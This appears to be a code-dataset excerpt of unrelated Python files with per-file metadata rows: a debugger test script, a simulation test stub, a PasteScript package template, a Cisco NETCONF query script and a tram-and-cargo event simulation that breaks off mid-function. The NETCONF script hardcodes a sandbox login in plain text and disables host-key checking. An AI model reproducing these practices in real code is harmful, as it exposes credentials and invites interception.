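# Illustrative usage sketch (Python 2, matching the code above):
#
#   sensor = LangSense()
#   print sensor.detect("bonjour tout le monde", country_hint="FR")
#   # -> [(language, normalized_score), ...], best match first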
| 27.666667 | 143 | 0.609695 | 478 | 3,569 | 4.416318 | 0.16318 | 0.086215 | 0.072004 | 0.061582 | 0.413074 | 0.32307 | 0.306016 | 0.221696 | 0.157745 | 0.157745 | 0 | 0.005712 | 0.26422 | 3,569 | 128 | 144 | 27.882813 | 0.798172 | 0.005884 | 0 | 0.413043 | 0 | 0 | 0.013818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.043478 | 0.032609 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9fa815038e88bc8c7182ffc9b58dd48bcbb7159c | 329 | py | Python | src/testMultiRootWkspc/workspace5/remoteDebugger-start.py | ChaseKnowlden/vscode-jupyter | 9bdaf87f0b6dcd717c508e9023350499a6093f97 | [
"MIT"
] | 2,461 | 2016-01-21T16:40:43.000Z | 2022-03-31T12:01:55.000Z | src/testMultiRootWkspc/workspace5/remoteDebugger-start.py | ChaseKnowlden/vscode-jupyter | 9bdaf87f0b6dcd717c508e9023350499a6093f97 | [
"MIT"
] | 12,536 | 2019-05-06T21:26:14.000Z | 2022-03-31T23:06:48.000Z | src/testMultiRootWkspc/workspace5/remoteDebugger-start.py | vasili8m/vscode-python | 846eee870e8b7bab38172600836faedb5fb80166 | [
"MIT"
] | 871 | 2019-05-15T13:43:55.000Z | 2022-03-31T03:04:35.000Z | import sys
import time
def main():
    sys.stdout.write('this is stdout')
    sys.stdout.flush()
    sys.stderr.write('this is stderr')
    sys.stderr.flush()
    # Give the debugger some time to add a breakpoint.
    time.sleep(5)
    for i in range(1):
        time.sleep(0.5)
        pass
    print('this is print')
main()
| 18.277778 | 54 | 0.613982 | 51 | 329 | 3.960784 | 0.568627 | 0.089109 | 0.108911 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016461 | 0.261398 | 329 | 17 | 55 | 19.352941 | 0.814815 | 0.145897 | 0 | 0 | 0 | 0 | 0.146953 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.076923 | 0.153846 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9fa8a760a99df59cb027859fabf342dae3bf5734 | 2,985 | py | Python | rbb_tools/src/rbb_tools/simenvs/test.py | SK4P3/rbb_core | 618617270314af5335de30179072244e1f440c4c | [
"MIT"
] | 55 | 2019-05-09T06:43:05.000Z | 2021-12-08T05:56:43.000Z | rbb_tools/src/rbb_tools/simenvs/test.py | SK4P3/rbb_core | 618617270314af5335de30179072244e1f440c4c | [
"MIT"
] | 5 | 2019-09-08T15:33:28.000Z | 2021-04-17T17:30:53.000Z | rbb_tools/src/rbb_tools/simenvs/test.py | SK4P3/rbb_core | 618617270314af5335de30179072244e1f440c4c | [
"MIT"
] | 16 | 2019-08-08T07:15:35.000Z | 2021-12-07T15:34:41.000Z | # AMZ-Driverless
# Copyright (c) 2019 Authors:
# - Huub Hendrikx <hhendrik@ethz.ch>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import yaml
from rbb_tools.simenvs.environment import SimulationEnvironment
class TestSimulationEnvironment(SimulationEnvironment):

    def __init__(self, env_config, sim_config, output_dir, tmp_dir):
        super(TestSimulationEnvironment, self).__init__(env_config, sim_config, output_dir, tmp_dir)
        self._fail = True
        if 'fail' in sim_config:
            self._fail = sim_config["fail"]

    def prepare(self):
        logging.info("TestSimulationEnvironment.prepare()")
        return True

    def simulate(self):
        logging.info("TestSimulationEnvironment.simulate()")

        output_file = {
            'title': "TestSimulationEnvironment",
            'repetitions': {
                'Test run 1': {
                    'bag': None,
                    'pass': True,
                    'duration': 1.0,
                    'results': {"some-result": "good"}
                },
                'Test run 2': {
                    'bag': 'missing-bag.bag',
                    'pass': not self._fail,
                    'duration': 1.0,
                    'results': {"some-result": "bad"}
                },
                'Test run 3': {
                    'bag': 'bag.bag',
                    'pass': True,
                    'duration': 1.0,
                    'results': {"some-result": "this one has a bag"}
                }
            }
        }

        with open(self._output_dir + "/output.yaml", 'w') as f:
            yaml.safe_dump(output_file, f, default_flow_style=False)

        with open(self._output_dir + "/bag.bag", 'w') as f:
            for x in range(1024):
                f.write("THIS IS A FAKE ROSBAG \n")

        return True

    def clean(self):
        logging.info("TestSimulationEnvironment.clean()")


environment = TestSimulationEnvironment
| 34.709302 | 100 | 0.61206 | 350 | 2,985 | 5.131429 | 0.471429 | 0.048998 | 0.025056 | 0.066815 | 0.114143 | 0.090757 | 0.075724 | 0.075724 | 0 | 0 | 0 | 0.008072 | 0.294472 | 2,985 | 85 | 101 | 35.117647 | 0.844729 | 0.368844 | 0 | 0.152174 | 0 | 0 | 0.201505 | 0.069318 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.065217 | 0.065217 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9fb1e69711f393a902cc733c79510a11dd6b8db4 | 7,309 | py | Python | backend/venv/Lib/site-packages/github/tools/template.py | analurandis/Tur | b4b5d1230d70659be0c3f477f0baea68fc46ba39 | [
"MIT"
] | null | null | null | backend/venv/Lib/site-packages/github/tools/template.py | analurandis/Tur | b4b5d1230d70659be0c3f477f0baea68fc46ba39 | [
"MIT"
] | null | null | null | backend/venv/Lib/site-packages/github/tools/template.py | analurandis/Tur | b4b5d1230d70659be0c3f477f0baea68fc46ba39 | [
"MIT"
] | null | null | null | """
:Description: PasteScript Template to generate a GitHub hosted python package.

Lets you set the package name, a one line description, the Licence (supports
GPL, LGPL, AGPL and BSD - GPLv3 by default) and the author name, email and
organisation variables::

    paster create -t gh_package <project name>

.. note::
    The default author name and email variables are the ones set with
    git-config::

        git config --global user.name "Damien Lebrun"
        git config --global user.email dinoboff@hotmail.com

The result::

    <project name>/
        docs/
            source/
                _static
                _templates/
                conf.py
                index.rst
        src/
            <package name>/
                __init__.py
        support-files/
        .gitignore
        bootstrap.py
        LICENCE
        MANIFEST.in
        pavement.py
        README.rst
        setup.cfg

* <project name>/pavement.py is the paver configuration file. All the
  setuptools tasks are available with paver, and paver makes the creation of
  new tasks easy. See the
  `paver documentation <http://www.blueskyonmars.com/projects/paver/>`_
  for more details::

      paver paverdocs

* <project name>/src contains your package.
* <project name>/docs/source/ will contain your documentation source; conf.py
  is Sphinx' configuration file.
  Check `Sphinx' documentation <http://sphinx.pocoo.org/>`_ for more details.

.. note::
    The version number, the project name and author name(s) are set in
    ``pavement.py`` and shared with ``docs/source/conf.py``.

    However, licence and copyright information are hard coded into ``LICENCE``,
    ``pavement.py``, ``docs/source/conf`` and ``src/<package>/__init__.py``.

"""
from datetime import date
import os

from paste.script.templates import var
from paste.script.templates import Template
from git import Git

YEAR = date.today().year

LICENCE_HEADER = """%(description)s

Copyright (c) %(year)s, %(author)s
All rights reserved.
"""

GPL = """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU%(gpl_type)s General Public License as published by
the Free Software Foundation, either version %(gpl_version)s of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU%(gpl_type)s General Public License for more details.

You should have received a copy of the GNU%(gpl_type)s General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

BSD = """
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice,
  this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.
* Neither the name of the %(org)s nor the names of its contributors
  may be used to endorse or promote products derived from this software
  without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""

DEFAULT_NAME = Git(os.getcwd()).config(
    'user.name', with_exceptions=False).strip()
DEFAULT_NAME = DEFAULT_NAME or os.getlogin()
DEFAULT_EMAIL = Git(os.getcwd()).config(
    'user.email', with_exceptions=False).strip()


class GithubTemplate(Template):
    """Paver template for a GitHub hosted Python package."""

    _template_dir = 'tmpl/gh'
    summary = ("A basic layout for project hosted on GitHub "
               "and managed with Paver")
    use_cheetah = True
    vars = [
        var('package', 'The package contained',
            default='example'),
        var('description',
            'One-line description of the package',
            default='<One-line description>'),
        var('licence',
            'package licence - GPLv2/GPLv3/LGPLv2/LGPLv3/AGPLv3/BSD',
            default='GPLv3'),
        var('author', 'Author name', DEFAULT_NAME),
        var('author_email', 'Author email', DEFAULT_EMAIL),
        var('org', 'Organisation name - for the licence.',
            default='<Organisation>'),
    ]

    def check_vars(self, vars, command):
        """
        Reset the package variable in interactive mode so that the project
        and package names can be different (GitHub and Python have different
        restrictions on names).
        """
        if not command.options.no_interactive and \
                not hasattr(command, '_deleted_once'):
            del vars['package']
            command._deleted_once = True
        return Template.check_vars(self, vars, command)

    def pre(self, command, output_dir, vars):
        """
        Set extra template variables:

        * "year", the current year.
        * "gitignore", set to ".gitignore".
        * "licence_body", the licence notice of the package.
        * "gpl_type" and "gpl_version", for the GPL licence family.
        """
        vars['year'] = YEAR
        vars['gitignore'] = '.gitignore'
        licence = vars.get('licence')
        vars['licence_body'] = ''
        vars['gpl_type'] = ''
        vars['gpl_version'] = ''
        if licence:
            if licence == 'BSD':
                licence_tmpl = BSD
            elif licence == 'LGPLv2':
                vars['gpl_type'] = ' Lesser'
                vars['gpl_version'] = '2'
                vars['licence'] = 'LGPLv2'
                licence_tmpl = GPL
            elif licence == 'LGPLv3':
                vars['gpl_type'] = ' Lesser'
                vars['gpl_version'] = '3'
                vars['licence'] = 'LGPLv3'
                licence_tmpl = GPL
            elif licence == 'AGPLv3':
                vars['gpl_type'] = ' Affero'
                vars['gpl_version'] = '3'
                vars['licence'] = 'AGPLv3'
                licence_tmpl = GPL
            elif licence == 'GPLv2':
                vars['gpl_type'] = ''
                vars['gpl_version'] = '2'
                vars['licence'] = 'GPLv2'
                licence_tmpl = GPL
            else:
                vars['gpl_type'] = ''
                vars['gpl_version'] = '3'
                vars['licence'] = 'GPL'
                licence_tmpl = GPL
            vars['licence_body'] = (LICENCE_HEADER + licence_tmpl) % vars | 36.004926 | 82 | 0.63716 | 907 | 7,309 | 5.066152 | 0.334068 | 0.018281 | 0.014363 | 0.008487 | 0.181502 | 0.098585 | 0.066159 | 0.052666 | 0.045267 | 0.029597 | 0 | 0.00375 | 0.270352 | 7,309 | 203 | 83 | 36.004926 | 0.857866 | 0.289369 | 0 | 0.163636 | 1 | 0 | 0.560985 | 0.007094 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018182 | false | 0 | 0.045455 | 0 | 0.118182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9fb58ec6926f4ee6f24f0c39bf1b0ebd934bf3b3 | 1,284 | py | Python | netconf-cisco.py | Raul-Flores/Network-programmability-examples | e540b050b89da167b84f415565b75313605e01b2 | [
"Apache-2.0"
] | 2 | 2020-01-09T18:32:37.000Z | 2020-01-09T18:32:42.000Z | netconf-cisco.py | Raul-Flores/Network-programmability-examples | e540b050b89da167b84f415565b75313605e01b2 | [
"Apache-2.0"
] | null | null | null | netconf-cisco.py | Raul-Flores/Network-programmability-examples | e540b050b89da167b84f415565b75313605e01b2 | [
"Apache-2.0"
] | null | null | null | from ncclient import manager
from xml.dom import minidom
import xmltodict

huaweiautomation = {'address': 'ios-xe-mgmt-latest.cisco.com',
                    'netconf_port': 10000, 'username': 'developer', 'password': 'C1sco12345'}

huawei_manager = manager.connect(host=huaweiautomation["address"], port=huaweiautomation["netconf_port"],
                                 username=huaweiautomation["username"], password=huaweiautomation["password"],
                                 device_params={'name': 'iosxe'}, hostkey_verify=False)

filter_Interfaces = """
<filter>
  <interfaces xmlns="urn:ietf:params:xml:ns:yang:ietf-interfaces">
    <interface>
    </interface>
  </interfaces>
</filter>
"""

# For any interface
huawei_get_interfaces = huawei_manager.get_config('running', filter_Interfaces).xml

xml_pretty = minidom.parseString(huawei_get_interfaces)
print ("Interfaces in XML format")
print ("#" * 100)
print (xml_pretty.toprettyxml(indent=" "))

xml_to_dict_general = xmltodict.parse(huawei_get_interfaces)
print ("#" * 100)
print ("Extract all the interfaces")
for x in xml_to_dict_general['rpc-reply']['data']['interfaces']['interface']:
    print (x['name'])
print ("#" * 100)

#print ("Status....")
#print ("")
#huawei_manager.connected
# check the capabilities
#for capability in huawei_manager.server_capabilities:
# print (capability) | 29.860465 | 150 | 0.746106 | 150 | 1,284 | 6.213333 | 0.5 | 0.055794 | 0.061159 | 0.051502 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017301 | 0.099688 | 1,284 | 43 | 151 | 29.860465 | 0.788927 | 0.135514 | 0 | 0.115385 | 0 | 0 | 0.326993 | 0.072464 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.115385 | 0 | 0.115385 | 0.269231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9fcb149ac5dfe464c79d244e6065b0b4f62a43f1 | 20,865 | py | Python | modules/simulation/simulation.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | modules/simulation/simulation.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | modules/simulation/simulation.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | """
Module to execute the simulation for a given instance.
"""

""" import packages """
import logging
from importlib import import_module
import numpy.random as rdm
import copy
import numpy as np

""" import project configurations """
import configurations.settings_simulation as config

""" import project libraries """
import modules.data.datamgm as dtm
from modules.simulation.entities import Tram, Stop, Passengers, CargoRequest, write_entities_log, init_entities_log

# Global logger
logger = dtm.initialise_logger(__name__)

"""
GLOBAL VARIABLES
----------------
- These variables must be reset after every simulation run
"""
#: now Simulation clock
now = -1
#: last_now Time of the last event
last_now = 0
#: event_queue Event queue
event_queue = []
#: trams List of running trams
trams = []
#: stops List of stops
stops = []
#: cargo List of cargo requests
cargo = []
#: updates Set of entities whose logs need updating
updates = set()
#: numEvents Number of total events
numEvents = 0


def reset_variables():
    """
    Function to reset all global variables
    """
    global now, last_now, numEvents, trams, stops, event_queue, cargo, updates
    now = -1
    last_now = 0
    numEvents = 0
    if trams:
        trams[0].reset()
        trams.clear()
    for stop in stops:
        stop.reset()
    stops.clear()
    event_queue.clear()
    Passengers.reset()
    if cargo:
        cargo[0].reset()
        cargo.clear()
    updates.clear()


"""
SIMULATION LOGGING
------------------
- Simulation log (text file): Includes all information about the events in the simulation
- Entities log (csv file): Includes the relevant data of the single entities
"""
# "Simulation Log": What happens in a single simulation run? (Descriptive)
sim_log = logging.getLogger("simulation")
# "Entities Log": How do the variables change during one simulation run?
ent_log = logging.getLogger("entities")

"""
SIMULATION METHODS
------------------
"""


def run(instance, passengerData, seed=False, index_child_seed=False):
    """
    Run the simulation

    :param instance: Path to the instance file
    :param passengerData: Path to the passenger data file
    :param seed: Seed to replicate the simulation
    :param index_child_seed: Index of the child of the global seed sequence
    """
    # Used global variables
    global inst, now, last_now, event_queue, numEvents

    """ Initialise random generator """
    # Check seed for random generator
    if seed:
        # seed sequence
        entropy = seed.entropy
    else:
        seed = rdm.SeedSequence()
        entropy = seed.entropy

    # Import instance (from .py-file)
    inst = dtm.import_instance(instance)
    # Initialize the simulation
    passenger = initialize(seed, passengerData)

    # Run the simulation
    running = True
    while running:
        # sort the upcoming events according to the time they occur
        event_queue = sorted(event_queue, key=lambda i: i['time'])
        if event_queue:
            if event_queue[0]['time'] != now:
                if now >= 0:
                    status(now)
                    for entity in updates:
                        if entity == "passenger":
                            entity = passenger
                        entity.last_event = now
                        write_entities_log(entity, now)
                    updates.clear()
                last_now = now
                now = event_queue[0]['time']
                sim_log.info("\n-----------------------------------------------------------------------------------")
                sim_log.info(f"Events at {now}:")
                sim_log.info("***")
            next_event()
            numEvents += 1
            event_queue.pop(0)
        # No more events
        else:
            last_time_period(inst.numPeriods - 1, passenger)
            running = False

    # Save values for replicability
    sim_log.info(f"\nentropy:\n{entropy}\n")
    sim_log.info(f"index_child_seed:\n{index_child_seed}\n")
    # Reset after simulation run
    reset_variables()


# Initialisation
def initialize(seed, passengerData):
    """
    This function initialises the simulation run, i.e., creates the needed variables and adds the first events to the event queue.

    :param seed: Seed for replicability
    :type seed: int
    :param passengerData: Path to passenger data file
    :type passengerData: string or path
    :return: Global passenger object to track the number of passengers
    :rtype: Passengers object
    """
    global event_queue
    sim_log.info("Initialisation...\n--------------------------------------")
    # Create a child seed sequence per entity
    seeds = seed.spawn(10)
    # Entities Log
    init_entities_log()
    # initialize stops
    for s in range(inst.numStops):
        #sim_log.info("Creating Stop {}.".format(s))
        distance_to = {"Stop": inst.stops_distance[s], "Customer": [0]}
        distance_from = {"Stop": [inst.stops_distance[j][s] for j in range(inst.numStops)], "Customer": [0]}
        if s == 0:
            stops.append(Stop(distance_to, distance_from, True))
        else:
            stops.append(Stop(distance_to, distance_from))
    pas = dtm.import_instance(passengerData)

    """ Initialize passengers """
    passenger_seeds = seeds[0].spawn(6)
    if config.random_passenger_arrival:
        arriving = pas.arriving_intensity
        config.random_passenger_arrival = passenger_seeds[0]
    else:
        arriving = pas.passenger_arriving
    # instantiate passenger arrivals
    nonzero = np.nonzero(arriving)
    for i in range(len(nonzero[0])):
        p = nonzero[0][i]
        s = nonzero[1][i]
        create_event(p, 6, [s])
    if config.random_passenger_boarding:
        config.random_passenger_boarding = passenger_seeds[1]
    if config.random_passenger_alighting:
        config.random_passenger_alighting = passenger_seeds[2]
    if config.random_passenger_changing:
        config.random_passenger_changing = passenger_seeds[3]
    if config.random_boarding_time:
        config.random_boarding_time = passenger_seeds[4]
    if config.random_alighting_time:
        config.random_alighting_time = passenger_seeds[5]

    """ Global passenger variables """
    passenger = Passengers(
        # passenger arrival
        random_arrival=config.random_passenger_arrival,
        arriving_passengers=arriving,
        arriving_passengers_cum=pas.passenger_arriving_acc,
        # passenger boarding
        random_boarding=config.random_passenger_boarding,
        boarding_rate=[1 for tram in range(inst.numTrams)],
        # passenger alighting
        random_alighting=config.random_passenger_alighting,
        alighting_rate=pas.passenger_allighting_rate,
        # passenger changing
        random_changing=config.random_passenger_changing,
        changing_rate=[0 for tram in range(inst.numStops)],
        # time
        random_boarding_time=config.random_boarding_time,
        random_alighting_time=config.random_alighting_time,
        service_time=inst.passenger_service_time_board,
        service_time_alight=inst.passenger_service_time_alight,
    )

    # Initialize the starting times of each tram
    tram_seeds = seeds[1].spawn(inst.numTrams)
    for t in range(inst.numTrams):
        sim_log.info(f"Tram {t} will start at {inst.tram_time_arrival[t][0]}.")
        Tram.numTotal += 1
        create_event(inst.tram_time_arrival[t][0], 1, [t, tram_seeds[t]])

    # Initialize the cargo release
    cargo_seeds = seeds[2].spawn(inst.numCargo)
    for c in range(inst.numCargo):
        sim_log.info(f"Cargo request {c} will start at {inst.cargo_release[c]}.")
        create_event(inst.cargo_release[c], 5, [c, cargo_seeds[c]])

    # sort the event queue according to the time
    event_queue = sorted(event_queue, key=lambda i: i['time'])
    sim_log.info("\n-----------------------------------------------------------------------------------\n")
    return passenger


def last_time_period(time, passenger):
    """
    Write the log for the last period of the simulation

    :param time: last period
    :type time: float
    :param passenger: passenger object
    :type passenger: Passengers object
    """
    status(time)
    for t in trams:
        write_entities_log(t, time)
    for s in stops:
        write_entities_log(s, time)
    write_entities_log(passenger, time)
    for c in cargo:
        c.estimate_delay(time)
        write_entities_log(c, time)


def status(time):
    """
    Add the status of all entities to the simulation log

    :param time: Time of update
    :type time: float
    """
    global updates
    sim_log.info("\n*~* Status *~*")
    for t in trams:
        t.info()
        if len(t.sequences) < t.stopped:
            t.sequences.append({"time": time, "cargo": t.cargosize, "passengers": t.passengers, "delay": t.delay})
    for s in stops:
        s.info()
        if len(s.sequences) < s.stopped:
            s.sequences.append({"time": time, "cargo": s.cargosize, "passengers": s.passengers})
    CargoRequest.info()
    Passengers.info()


"""
METHODS FOR HANDLING EVENTS
---------------------------
"""


def create_event(t, event_id, par):
    """
    Creating a new event given an event id and a list of parameters (if the event is within the time horizon)

    :param t: time
    :type t: float
    :param event_id: event id
    :type event_id: int
    :param par: event parameters
    :type par: list
    """
    if np.ceil(t) < inst.numPeriods:
        event_queue.append({"time": t, "id": event_id, "par": par})


def next_event():
    """
    Execute the next event in the event queue
    """
    # Choose the next event
    event = event_queue[0]
    # Extract event id and parameters
    event_id = event["id"]
    par = event["par"]
    # Event-id: 1
    # Description: Starting a new tram
    if event_id == 1:
        starting_tram(par[0], seed=par[1])
    # Event-id: 2
    # Description: Tram reaches stop (but does not enter yet)
    if event_id == 2:
        tram_reaches_stop(par[0])
    # Event-id: 3
    # Description: Tram enters stop
    if event_id == 3:
        tram_entering_stop(par[0])
    # Event-id: 4
    # Description: Tram leaves stop (and next tram can enter this stop)
    if event_id == 4:
        tram_leaves_stop(par[0])
    # Event-id: 5
    # Description: Cargo is released
    if event_id == 5:
        starting_cargo(par[0], seed=par[1])
    # Event-id: 6
    # Description: Update passengers
    if event_id == 6:
        passenger_update(par[0])


"""
EVENT METHODS
-----------------------------------
"""


def starting_tram(index, seed):
    """
    Event no. 1: Starting a tram

    :param index: Index of the tram
    :type index: int
    :param seed: Seed for replicability
    :type seed: int
    """
    global now, updates
    tram_id = len(trams)
    if config.random_travel_time:
        config.random_travel_time = seed
        # debugging
        #logger.debug(f"tram_travel_deviation: {config.tram_travel_deviation}")
    # if passengers and cargo share vehicles
    if inst.scheme == "SV":
        trams.append(Tram(
            tour=inst.tram_tour[index],
            capacity_passenger=inst.tram_capacity - inst.tram_capacity_min_cargo,
            capacity_cargo=inst.tram_capacity - inst.tram_capacity_min_passenger,
            capacity_total=inst.tram_capacity,
            schedule_arrival=inst.tram_time_arrival[index],
            schedule_departure=inst.tram_time_departure[index],
            speed=inst.tram_speed,
            # Simulation deterministic by default
            random_travel_time=config.random_travel_time,
            travel_deviation=config.tram_travel_deviation,
            max_service=inst.tram_max_service
        ))
    # if passengers and cargo have dedicated vehicles
    elif inst.scheme == "SI":
        if index in inst.cargo_tram_assignment:
            # cargo tram
            trams.append(Tram(
                tour=inst.tram_tour[index],
                capacity_passenger=0,
                capacity_cargo=inst.tram_capacity_cargo,
                capacity_total=inst.tram_capacity,
                schedule_arrival=inst.tram_time_arrival[index],
                schedule_departure=inst.tram_time_departure[index],
                speed=inst.tram_speed,
                # Simulation deterministic by default
                random_travel_time=config.random_travel_time,
                travel_deviation=config.tram_travel_deviation,
                max_service=inst.tram_max_service
            ))
        else:
            # passenger tram
            trams.append(Tram(
                tour=inst.tram_tour[index],
                capacity_passenger=inst.tram_capacity,
                capacity_cargo=0,
                capacity_total=inst.tram_capacity,
                schedule_arrival=inst.tram_time_arrival[index],
                schedule_departure=inst.tram_time_departure[index],
                speed=inst.tram_speed,
                # Simulation deterministic by default
                random_travel_time=config.random_travel_time,
                travel_deviation=config.tram_travel_deviation,
                max_service=inst.tram_max_service
            ))
    tram = trams[-1]
    if tram.is_operating:
        tram_reaches_stop(tram_id)
    else:
        updates.add(tram)


def tram_reaches_stop(tram_id):
    """
    Event no. 2: Tram reaches a stop. It either queues up or enters the stop.

    :param tram_id: tram id
    :type tram_id: int
    """
    global now
    tram = trams[tram_id]
    tram.reach_next_location(now)
    stop = stops[tram.tour[tram.position]]
    if stop.check_queue(tram):
        tram_entering_stop(tram_id)
    else:
        updates.add(tram)


def tram_entering_stop(tram_id):
    """
    Event no. 3: Tram enters the platform of the stop.

    :param tram_id: tram id
    :type tram_id: int
    """
    global now, updates
    tram = trams[tram_id]
    stop = stops[tram.tour[tram.position]]
    tram.enter_next_stop(stop, now)
    boarding_time = 0
    alighting_time = 0
    # Update passengers
    if tram.passenger_transport:
        boarding_time, alighting_time = passenger_update(stop.index, True, True)
    # Compute leaving time with passengers only
    leaving_time = tram.compute_leaving_time(now, boarding_time, alighting_time)
    new_leaving_time = False
    if tram.cargo_transport:
        # unloading
        tram_cargoload = copy.copy(tram.cargoload)
        for c in tram_cargoload:
            request = cargo[c]
            if request.end_stop == stop.index:
                unloading_time = request.unload(tram, stop, now)
                new_leaving_time = tram.compute_leaving_time(now, unloading_time=unloading_time)
                updates.add(request)
        tram_cargoload.clear()
        # loading
        stop_cargoload = copy.copy(stop.cargoload)
        for c in stop_cargoload:
            request = cargo[c]
            if request.assigned_vehicle == tram.index:
                loading_time = request.load(tram, stop)
                new_leaving_time = tram.compute_leaving_time(now, loading_time=loading_time)
                updates.add(request)
        stop_cargoload.clear()
    updates.add(tram)
    create_event(tram.leaving_time, 4, [tram_id])
    return updates


def tram_leaves_stop(tram_id):
    """
    Event no. 4: Tram leaves the stop.

    :param tram_id: tram id
    :type tram_id: int
    """
    global now
    tram = trams[tram_id]
    stop = stops[tram.tour[tram.position]]
    if tram.leaving_time == now:
        travel_time = tram.leave_location(stop, now)
        updates.add(tram)
        updates.add(stop)
        if tram.is_operating:
            create_event(now + travel_time, 2, [tram_id])
        next_tram = stop.next_tram_in_queue(tram)
        if next_tram >= 0:
            create_event(now + inst.min_time_next_tram, 3, [next_tram])


def starting_cargo(index, seed):
    """
    Event no. 5: A new cargo request arrives

    :param index: cargo index
    :type index: int
    :param seed: seed for randomisation
    :type seed: int
    """
    global now, updates, trams
    # Generate new cargo request
    cargo.append(CargoRequest(
        release=inst.cargo_release[index],
        deadline=inst.cargo_station_deadline[index],
        end_stop=inst.cargo_station_destination[index],
        assigned_vehicle=inst.cargo_tram_assignment[index],
        stop=stops[0],
        service_time=inst.cargo_service_time_load,
        service_time_unload=inst.cargo_service_time_unload,
        size=inst.cargo_size,
        random_service_time=seed,
    ))
    request = cargo[-1]
    # Check if a tram is currently at the platform
    stop = stops[request.start_stop]
    # Update the log of stop and request
    updates.add(stop)
    updates.add(request)
    # If the assigned vehicle is currently at the depot
    if stop.current_tram == request.assigned_vehicle:
        # load tram
        tram = trams[request.assigned_vehicle]
